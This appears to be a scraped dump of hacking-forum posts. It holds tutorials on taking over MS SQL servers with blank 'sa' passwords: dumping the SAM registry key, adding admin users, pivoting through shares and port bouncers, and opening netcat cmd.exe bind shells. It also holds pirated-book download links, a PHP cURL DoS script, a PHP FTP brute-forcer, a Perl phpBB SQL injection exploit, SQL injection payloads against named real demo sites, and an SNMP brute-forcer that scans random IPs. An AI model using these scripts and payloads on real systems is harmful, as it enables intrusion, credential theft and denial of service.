execute it like this: osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread ‘HKEY_LOCAL_MACHINE’, ‘SECURITY\SAM\Domains\Account’, ‘F’" and in this key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5 the password of the SA user is stored in plain text could be handy if you hack a machine that has sql running and the hack has got no super user rights like IISMEDIA exploit. then just grab the sql pass from the registry. ********************************************************************************************************* 6) Final Words Hope this has been of some help I can give NO garantee everything in here will work under different circumstances. But all citics are welcome. Further I have spend some time investigating all this and trying to explain it in a simple as possible way so I say again don't bitch if this ain't good enough for mass-hacking. For the rest keep learning and finding out things peeps Hacking is something you gotta feel. Don't be lame, don't be lazy try thinigs yourself it really pays back. 1 final note: I did not give scenario's and solutions on purpose I hope that with he info that is in this paper you all will have enough imagination to hack something with it. Maybe later on I will make a scenario and solutions paper about this. Greetz, kd-team

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +This is a little Disclaimer for if you havn't read the one on our site. + +The tools and tutorials KD-Team develops and publishes are only ment for + +educational purpose only.WE DO NOT encourage the use of this tools and + +tutorials for mailicious purpose.We learned a lot during the development of them + +so we hope you also learn and don't just use it without any brains. + +We take completly NO responsability for any damage caused by them nor + +are we or our isp responsible for what you do with them. + +Greetz: KD-Team + +[url]http://www.kd-team.com[/url] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ SQL- Possible situation and solutions to it. Written By: kd-team Some info is from other tutorials thx to the peeps who wrote them. Well this tut is intended for the harder machines that are not so easy to hack. 1.) a machine with a intern ip number 2.) a machine in a network with no rights to write to the local harddisk 3.) a alternative shell to the normal sqlexec.exe 4.) A bit of maybe usefull words ______________________________________ 1.) a machine with a intern ip number | ______________________________________ *********Solution Number 1:************************ Thx to dD for the initial tutorial. Let's say you hack a machine with the normal sa/blank pass and when you do ipconfig it says 10.0.0.15 or 192.53.56.12. The first thing to do is to check if it has firewall if that is not the case then look if port 135 = open or port 3389. Add yourself as a new user or change the password of the admin change: net user Admin newpass new: net user test password /add When you've done this you can connect with remote desktop to 3389 and use the user/pass or just do it the traditional NT way *********Solution Number 2:************************ Always when you have a machine with a internal ip number it means that it is part of a network that means 2 things that is has ports forwarded that's how you hacked it the port of SQL = forwarded pretty dumb but ohwell and it also means that there is another machine who has a normal ip or a router. If it is a normal machine then they have used software things and 2 network card to make a network if this is the case you can still run a ftp server on it. first you've got to do is find out what the main server could be view computers on te network: net view usually it has normal names to recognize like Server2000, PrimaryPc, Server, MainServer etc Ones you've find that out you've got to see if they have shares share command: net view \\MainServer if they've got like C shared or something like that you can just connect to it with no password. connect command: net use Z: \\MainServer\C then change to the new mapped drive. Now comes the tricky part. When you are on the share of the server you've got to install a bouncer or a redirector that is a thing that redirects the connection a port to another port or IP. For this example I'll use Bouncer already posted at the board:) you run it (it's best to install it as a service bouncer itself has no service option but it can still be done) command for bouncer: bouncer.exe --port 1234 --destination 192.53.56.12:1234 --daemon little info on this line --port = the listening port on the server machine --destination = the intern ip to where it sshould be bounced or redirected the incomming traffic. when this is done just run you're favo ftp server on the intern machine and all connection will get there. _________________________________________________________________________ 2.) a machine in a network with no rights to write to the local harddisk | _________________________________________________________________________ When you have a machine that when you use ftp or tftp says that it can't write to local harddisk. Then just used the method explained above to hack it on the NT way because even though you can't write to the harddisk you usually still can add users etc __________________________________________________ 3.) a alternative shell to the normal sqlexec.exe | __________________________________________________ Usually when you have got sqlexec connected and you are working with it usually you get errors like: SQL_NO_DATA SQL_ERROR and then you just can't do anything with it well here a simple but effective way to get a other shell. if tftp or ftp works just upload nc.exe(netcat can found everywhere on the net). ones uploaded there are 2 commands you can use: command1: nc.exe -l -p 1234 -d -e cmd.exe command2: nc.exe -p 1234 -L -d -e cmd.exe first of all it is NOT WISE to install nc as a service since it doesn't have password protection that means that anyone can take over the machine nou explanation of the commands: command1: this is a use and dump command it means that you can connect only ones to it after you disconnet it is gone then you've got to do it all over again with sql. But as said before this shell is intended to make the hack easier and not as backdoor. command2: with this command nc keeps listening so after you disconnect you can reconnect again. this is only handy if you are hacking a network and need to disconnect to do other things or something like that but not recomended because if someone finds it bye bye stro you can stop this by killing nc after you are done. _________________________________ 4.) A bit of maybe usefull words | _________________________________ When you are hacking or you wanna learn to hack plz make a diference for yourself I mean make up you're mind if you wannabee super fxp/defacing dude (100boxes in 1 hour) OR you wanna learn to hack interesting shit for the first peeps this tut is useless because it is time consuming so just use the normal and fast shit skip networks and such things for the second peeps tut it can be usefull because it mixes a few ways together so at the end you have control of the machine. Last thing to say Hack away but keep it nice Greetz, kd-team

Book Description: Asterisk hacking shows readers about a hacking technique they may not be aware of. It teaches the secrets the bad guys already know about stealing personal information through the most common, seemingly innocuous, highway into computer networks: the phone system. The book also comes with an Asterisk Live CD (SLAST) containing all the tools discussed in the book and ready to boot! This book shows readers what they can do to protect themselves, their families, their clients, and their network from this invisible threat. Power tips show how to make the most out of the phone system and turn it into a samurai sword for defense or attack! *Asterisk Live CD (SLAST) containing all the tools discussed in the book and ready to boot! *Contains original code to perform previously unthought of tasks like changing caller id, narrowing a phone number down to a specific geographic location, and more! *See through the eyes of the attacker and learn WHY they are motivated, something not touched upon in most other titles Download : http://rapidshare.com/files/40552712/1597491519.pdf

Book Description: Workflow is the glue that binds information worker processes, users, and artifacts. Without workflow, information workers are just islands of data and potential. Workflow in the 2007 Microsoft Office System details how to implement workflow in SharePoint 2007 and the rest of the 2007 Office System to help information workers share data, enforce processes and business rules, and work more efficiently together or solo. This book covers anything you're likely going to need to know -- from what workflow is all about, to creating new Activities; from InfoPath forms to ASP.Net forms; from the Rules Engine to the object model. There's even a section on integrating Office 2003 clients with SharePoint 2007 workflows. You'll come away from reading this book with solid knowledge of how to implement workflow in the new world of Office and SharePoint. Download : http://rapidshare.com/files/40490073/1590597001.rar

Book Description: Over 700,000 IT Professionals Have Prepared for Exams with Syngress Authored Study Guides The Security+ Study Guide & Practice Exam is a one-of-a-kind integration of text and and Web-based exam simulation and remediation. This system gives you 100% coverage of official CompTIA Security+ exam objectives plus test preparation software for the edge you need to achieve certification on your first try! This system is comprehensive, affordable, and effective! * Completely Guaranteed Coverage of All Exam Objectives All five Security+ domains are covered in full: General Security Concepts, Communication Security, Infrastructure Security, Basics of Cryptography, and Operational / Organizational Security * Fully Integrated Learning This package includes a Study Guide, one complete practice exam, and Web-based exam simulation and remediation. * Each chapter starts by explaining the exam objectives covered in the chapter You will always know what is expected of you within each of the exams domains. * Exam-Specific Chapter Elements Notes, Tips, Alerts, Exercises, Exams Eyeview, and Self Test with fully explained answers. * Test What You Learned Hundreds of self-test review questions test your knowledge of specific exam objectives. A Self Test Appendix features answers to all questions with complete explanations of correct and incorrect answers. * Training DVD-ROM A complete Adobe PDF format version of the print Study Guide, along with complete practice exam with detailed answer explanations. Fast Tracks for quick topic review are provided in both HTML and PowerPoint format. *Only Security+ book that comes with a DVD *Revision to market-leading first edition *Realistic, Web-based practice exams included Download : http://rapidshare.com/files/40603525/1597491535.pdf

Un script scris de ReMuSoMeGa , a good friend !! va ucide orice atac Dos si DDoS. Cand serverul tau e atacat, e posibil ca serverul sa moara, dar acest script, garanteaza ca atacult va fi nimicit, si serverul tau va reveni in 2 minute. Daca dai mai departe nu uita sa pui CREDIT : ReMuSoMeGa #!/usr/local/bin/php -q <?php /* #--------------------------------------------------------------------------------------------------------------# # OMEGA SENTINEL V.2 - The ONLY php Anti-(D)Dos script! # # Programmed by ReMuSoMeGa (ReMuSoMeGa@MonsterNET.ws) - Feel Free to edit & redistribute # # but please credit the original author aswell... # # *********************************************** # # How does it work? # # Works perfectly! Sentinel is designed to run as a Daemon (or a background process). # # You only need one instance of this script running on a server & it will protect all clients. # # Sentinel works by monitoring your serverload 24/7. Once your load goes over normal operating # # loads, sentinel is then triggered. It starts off by scanning your server for all active connections. # # Then, based on your settings, if an IP has too many connections (default is 80), the IP will be assumed # # as the attacker & it will be banned via APF Firewall - unless the IP is listed under $ignore. # # After every (D)DoS attack, an email report will be sent to you. # # This method is also effective against Denial Of Service attacks. This script runs very fast, # # and can detect & ban multipal attackers before server loads reach a critical point. # # # How to use? # # In order to use this script, it MUST be ran as a root user & the function "shell_exec()" # # You will also need "APF Firewall" & "GNU Screen" installed. # # must be enabled in your php.ini settings - if it is disabled or if php is in safe mod, this script # # will not work. DO NOT ATTEMPT TO RUN VIA BROWSER. # # First set the variables where the script begins (They are commented & explained). # # upload this file to any safe directory on your server (non-public). To run this script, type: # # "screen php /path/to/sentinel.php". "SCREEN" will allow you to run this script as a background # # process, or a "Daemon". If you do not use 'Screen' to run it, Sentinel will still work, # # but when your ssh session ends, it will stop running. Screen will keep it running even when you # # logout of ssh. If you have local access to your server, you don't need to use "SCREEN" to run this. # #--------------------------------------------------------------------------------------------------------------# */ class Sentinel{ var $loadlimit = 15; // server's load limit before Sentinel assumes a DoS attack & kicks in var $conlimit = 80; // number of connections an IP can have during a DoS attack before Sentinel gets suspicious... var $ignore = "127.0.0.1, xx.xx.xx.xx"; // ignore these IP's - add your own! - Also, if your using a remote SQL server, add it. var $path = '/etc/apf/'; // Full path to APF Firewall directory, with trailing slashes var $rate = 60; // in seconds, how frequently should sentinel check your server load var $email = 'your@email.tld'; // your email - where logs are sent function goodload(){ $shell=shell_exec('uptime'); if(eregi('averages',$shell)){ $shell=explode("load averages:",$shell); } else{ $shell=explode("load average:",$shell); } $loads=trim($shell[1]); $loads=explode(" ",$loads); $myload=$loads[0]; if($myload>$this->loadlimit){ return 0; } else{ return 1; } } function ignore($ip){ $ips=explode(",",$this->ignore); for($i=0;$i<=count($ips)-1;$i++){ $ignore[]=trim($ips[$i]); } $rules=file_get_contents($this->path.'deny_hosts.rules'); $rules=explode("\n",$rules); foreach($rules as $rule){ if(!eregi('#', $rule)){ $ignore[]=$rule; } } foreach($ip as $i){ if(!in_array($i,$ignore)){ $good[]=$i; } } return $good; } function restartapf(){ ob_start(); $sh=shell_exec("{$this->path}apf -r"); if($sh){return 1;} else{ return 0; } ob_end_clean(); } function banip($ip){ $handle=fopen($this->path.'deny_hosts.rules', "a"); fwrite($handle,"\n".$ip); fclose($handle); return 1; } function getattackers(){ $shell=shell_exec('netstat -ntu | awk \'{print $5}\' | cut -d: -f1 | sort | uniq -c | sort -nr | more'); //$pattern="/.{1,} [1-9]{1,3}\.[1-9]{1,3}\.[1-9]{1,3}\.[1-9]{1,3}/"; //preg_match_all($pattern, $shell,$out); //$ips=$out[0]; $gips=explode("\n",$shell); foreach($gips as $wip){ if(eregi('.',$wip)){ $ips[]=trim($wip); } } foreach($ips as $ip){ $ip=explode(" ",$ip); if( ($ip[0]>=$this->conlimit) ){ $killthem[]=$ip[1]; } } if( eregi('warning, got duplicate',$killthem) ){ return 0; } $killthem=@$this->ignore($killthem); return $killthem; } function report($ips){ foreach($ips as $ip){ $rip .= "$ip\n"; } $subject = "YOUR SERVER WAS ATTACKED!"; $headers= "From: SENTINEL <SENTINEL@Protection.omg"; $body= "Omega Sentinel V2 has detected a (D)Dos attack against your server. The following IP's have been blocked:\n:\n-------------\n$rip\n------------"; mail($this->email,$subject,$body,$headers); } function guard(){ do{ sleep($this->rate); $load=$this->goodload(); if(!$load){ echo '.'; $ips=$this->getattackers(); if($ips){ foreach($ips as $ip){ $this->banip($ip); } $this->restartapf(); $this->report($ips); } } } while(1>0); } } $Sentinel=new Sentinel; $Sentinel->guard(); ?> Bafta!

<?php //Consol Based CURL Dos // By: Mad-Hatter // TheHackers.info //use ?x=9000&target=google.com // Target = Target // x = Connections /////////////////////////////////// function MakeArrays($count, $url) { echo "[+] Preparing Arrays\n"; $victim = array(); for($x = 0; $x <= $count; $x++) { $victim[$x] = $url; } echo "[+] DONE Preparing Arrays ({$count})\n"; return $victim; } if(!isset($_REQUEST['target']) || empty($_REQUEST['target'])) die("[-] Bitch go back and put in valid params.\n"); $victim = MakeArrays(trim($_REQUEST['x']), trim($_REQUEST['target'])); echo "[+] Preparing cURL "; $mh = curl_multi_init(); foreach ($victim as $i => $url) { $c[$i] = curl_init($url); curl_setopt($c[$i], CURLOPT_RETURNTRANSFER, 1); curl_multi_add_handle($mh, $c[$i]); } echo "[+] DONE Preparing cURL "; echo "[+] Starting cURL Attacks "; do { $n = curl_multi_exec($mh, $active); } while ($active); echo "[+] Attacks Completed "; echo "[+] Waiting for Server buffer. "; foreach ($victim as $i => $url) { $res[$i]=curl_multi_getcontent($c[$i]); curl_close($c[$i]); } echo "[+] DoS done?\n"; ?>

<?PHP set_time_limit(0); ################# # PHP-FTP Brute # # Mad-Hatter # #Thehackers.info# ################# $user = $_POST['user']; $list = $_POST['list']; $self = $PHP_SELF; if (!isset($_POST['go_for_it'])){ $serv = $_POST['serv']; echo "<center><form method='post' action='$self'></center> "; echo "<center>Host: <input type='text' name='serv'></center>"; echo "<center>User: <input type='text' name='user'></center>"; echo "<center>List: <input type='text' name='list'></center> "; echo "<center> <input type='submit' value='Attack' name='go_for_it'></center>"; echo "<center></form></center>"; exit; }else{ $passl = fopen($list, "r"); while(!feof($passl)){ $pass[$x] = fgets($passl, filesize($passl)); $x++; } fclose($passl); echo "<center>[b]<h2>FTP Password Cracker</h2>[/b] [Mad-Hatter]"; echo "<hr></center>"; $max = count($pass); echo "trying ". $max ." Passwords "; for($x=0; $x<$max; $x++){ $host = ftp_connect($serv, 21); if(ftp_login($host, $user, $pass[$x])){ echo "[b]Cracked[/b] "; echo "[+] [b]User:[/b] ".$user." "; echo "[+] [b]Pass:[/b] ".$pass[$x]." "; echo "[+] [b]Host:[/b] ".$serv>" "; echo"<Footer>[url='http://thehackers.info']The Hackers Info[/url]</Footer>"; die(); }else{ echo "Attempt ".$pass[$x]." Failed "; } } ftp_close($ftp); } echo"<Footer>[url='http://']The Hackers Info[/url]</Footer>"; ?>

#!/bin/perl use LWP::UserAgent; use HTTP::Cookies; if(@ARGV < 3) { ause(); exit();} $h=$ARGV[0]; $u=$ARGV[2]; $f=$ARGV[1]; $www = new LWP::UserAgent; $xpl="$h/?cat=-1+union+select+null,user_password,null+from+$f\_users+where+user_id=$u/*"; print "[~] Attacking $h\n"; $res = $www->get($xpl) or err(); $res->content() =~ /([0-9,a-f]{32})/ or err(); print "\n[~] User id:$u \r\n[~] Password hash:$1"; sub ause() { print "\n==[ OWNED ]==\n\n"; print "<-------------------------------------------------------->\n"; print "Multi-Forums Pro Host all versions for phpBB SQL injection exploit\r\n"; print "Ussage: owned.pl <path_to_directory.php> <forum_name> <user_id>\r\n"; print "e.g: owned.pl [url]http://site.com/directory.php[/url] info 2\r\n"; print "<-------------------------------------------------------->\n"; } sub err() {print "$xpl\n[-] Engine is NOT vulnerably"; exit();}

--==+================================================================================+==-- --==+ iBoutique SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SCRIPT DOWNLOAD: N/A SITE: [url]http://www.wscreator.com[/url] DORK: N/A DESCRIPTION: gain MD5 hash of any user including admin EXPLOITS: EXPLOIT 1 (admin): [url]http://www.server.com/SCRIPT_PATH/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_admin_users EXPLOIT 2 (users): [url]http://www.server.com/SCRIPT_PATH/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_users EXAMPLES: EXAMPLE 1 ON DEMO: [url]http://www.wscreator.com/iboutique/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_admin_users EXAMPLE 2 ON DEMO: [url]http://www.wscreator.com/iboutique/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_user NOTE/TIP: the table prefix may vary on diffrent sites (on demo its 'websiteadmin') to get prefix on other sites, you can cause a error the following way and show the sql query: http://server.com/iboutique/index.php?page=' that will spew out a error and you can then see the table prefix GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ ! --==+================================================================================+==-- --==+ iBoutique SQL Injection Vulnerbilitys +==-- --==+================================================================================+==--

--==+================================================================================+==-- --==+ Spiral Blog SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SCRIPT DOWNLOAD: N/A SITE: [url]http://www.spiralscripts.co.uk[/url] DORK: N/A DESCRIPTION: get users/admins password EXPLOITS: EXPLOIT 1: [url]http://www.server.com/SCRIPT_PATH/viewcomments.php?blogid=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable-- EXAMPLES: EXAMPLE ON DEMO: [url]http://www.spiralscripts.co.uk/demoscripts/blog/viewcomments.php?blogid=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable-- NOTE/TIP: admin login: [url]http://www.server.com/BLOG_PATH/admin[/url] GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ ! --==+================================================================================+==-- --==+ Spiral Blog SQL Injection Vulnerbilitys +==-- --==+================================================================================+==--

#!usr/bin/python #Uses nmap to check if snmp port is open then uses snmpwalk to try and bruteforce #the community name. #Required: nmap and snmpwalk #Changelog: added iprange, single scans and threading for random scans #Changelog: added the ability to add your own wordlist, it will add to #the ones given and erase the duplicates #[url]http://darkcode.ath.cx[/url] #d3hydr8[at]gmail[dot]com import time, StringIO, commands, sys, re, threading, sets def timer(): now = time.localtime(time.time()) return time.asctime(now) def title(): print "\n\t d3hydr8[at]gmail[dot]com snmpBruteForcer v1.2" print "\t--------------------------------------------------\n" def scan(option): nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+option+' -p 161 | grep open -B 3')[1]).read() if re.search("command not found",nmap.lower()): print "\n[-] nmap not installed!!!\n" sys.exit(1) else: ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap) if ipaddr: return ipaddr def brute(ip): print "\n[+] Attempting BruteForce:",ip try: for n in names: response = StringIO.StringIO(commands.getstatusoutput('snmpwalk '+ip+" "+n)[1]).readlines() if re.search("command not found",response[0].lower()): print "\n[-] snmpwalk not installed!!!\n" sys.exit(1) else: if verbose ==1: print "\t{- Trying:",n if len(response) > 1: print "\n\tSuccess:",ip,"Community Name:",n print "\n\tTry: snmpwalk",ip,n,"\n" except(), msg: #print "Error:",msg pass class Worker(threading.Thread): def run(self): ipaddr = scan("-iR 1") if ipaddr != None: for ip in ipaddr: brute(ip) if len(sys.argv) <= 2: title() print "Usage: ./snmp_random.py <option> \n" print "Example: ./snmpbrute.py -iprange 192.168.1-100.1-255 -verbose\n" print "[options]" print " -s/single <ip>: Bruteforce single ip" print " -i/-iprange <ip_range>: Scans ip range for snmp to brute force" print " -r/-random <how many to scan>: Will scan random ip's for snmp to brute force" print " -l/-list <wordlist file>: Add your own wordlist" print " -v/-verbose : Verbose Mode\n" sys.exit(1) #Add more community names here. names = ["1234","2read","4changes","CISCO","IBM","OrigEquipMfr","SNMP","SUN","access","admin","agent","all","cisco" ,"community","default","enable","field","guest","hello","ibm","manager","mngt","monitor","netman","network" ,"none","openview","pass","password","passwd","private","proxy","public","read","read-only","read-write" ,"root","router","secret","security","snmp","snmpd","solaris","sun","switch","system","tech","test" ,"world","write"] for arg in sys.argv[1:]: if arg.lower() == "-s" or arg.lower() == "-single": ipaddr = sys.argv[int(sys.argv[1:].index(arg))+2] mode = "Single IP" if arg.lower() == "-i" or arg.lower() == "-iprange": iprange = sys.argv[int(sys.argv[1:].index(arg))+2] mode = "Ip-Range" if arg.lower() == "-r" or arg.lower() == "-random": total = sys.argv[int(sys.argv[1:].index(arg))+2] mode = "Random" if arg.lower() == "-l" or arg.lower() == "-list": wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 title() try: print "[+] Wordlist:",wordlist,"loading" words = open(wordlist, "r").readlines() print "[+] Loaded:",len(words),"names" names = list(sets.Set(words+names)) except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) except(NameError): pass print "[+] Mode:",mode if mode == "Random": if total.isdigit() == False: print "\n[!] How many ips to scan: must be a number\n" sys.exit(1) else: print "[+] Total:",total if mode == "Ip-Range": print "[+] Range:",iprange try: if verbose ==1: print "[+] Verbose Mode On" except(NameError): verbose = 0 print "[-] Verbose Mode Off" print "[+] Names Loaded:",len(names) print "[+] Started:",timer(),"\n" if mode == "Random": for i in range(int(total)): print "[+] Scanning:",i+1,"of",total work = Worker() work.start() time.sleep(1) if mode == "Single IP": brute(ipaddr) if mode == "Ip-Range": print "[+] Scanning:",iprange ips = scan(iprange) if ips != None: print "[+] Found:",len(ips) for ip in ips: brute(ip) else: print "\n[!] No SNMP Open" print "\n[-] Done -",timer(),"\n"